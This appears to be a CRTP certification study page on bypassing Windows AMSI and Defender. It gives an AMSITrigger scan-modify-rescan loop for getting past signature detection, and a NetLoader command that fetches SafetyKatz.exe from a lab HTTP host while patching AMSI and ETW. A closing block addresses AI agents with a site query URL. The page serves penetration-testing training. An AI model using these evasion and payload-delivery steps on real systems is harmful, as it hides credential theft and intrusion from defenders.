# AMSI Bypass

### Bypass Defences On-Memory

### Bypass Defences On-Disk

[AMSITrigger](https://github.com/RythmStick/AMSITrigger)

{% code overflow="wrap" %}

```powershell
AmsiTrigger_x64.exe -i C: AD Tools Invoke PowerShellTcp_Detected.ps1 DefenderCheck.exe PowerUp.ps1
```

{% endcode %}

[DefenderCheck](https://github.com/t3hbb/DefenderCheck)

[Invoke-Obfuscation](https://github.com/danielbohannon/Invoke-Obfuscation)

Steps to avoid signature-based detection are pretty simple: 

1\) Scan using AMSITrigger 

2\) Modify the detected code snippet 

3\) Rescan using AMSITrigger 

4\) Repeat steps 2 & 3 till we get a result as “AMSI\_RESULT\_NOT\_DETECTED” or “BLANK"

### Payload Delivery

{% embed url="<https://github.com/Flangvik/NetLoader>" %}

It can be used to load binary from file path or URL and patch AMSI & ETW while executing.

```
C:\Users\Public\Loader.exe -path http://192.168.100.X/SafetyKatz.exe
```

**Summary of Bypassing Defence Mechanisms**

To evade on-memory and on-disk defences, the process involves iteratively modifying and scanning scripts or executables to evade signature-based detection tools like AMSITrigger. The goal is to continue the cycle of modification and rescanning until tools like AMSITrigger no longer detect the code, indicating a successful bypass.

* **On-Memory Bypass Routine:**
  1. Execute AMSITrigger to identify detectable code.
  2. Alter the code flagged by AMSITrigger.
  3. Rescan with AMSITrigger post-modification.
  4. Repeat until "AMSI\_RESULT\_NOT\_DETECTED" appears.
* **Delivery of Payload:**

  A loader can be utilized for delivering a payload, which involves fetching and executing a binary from either a local path or a remote URL. Consequently, the binary can patch both AMSI and ETW, helping the payload to avoid detection during execution. A typical command for this operation follows the format:

  ```
  Loader.exe -path <binary_source>
  ```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://crtp-certification.certs-study.com/prepare-your-vm/amsi-bypass.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.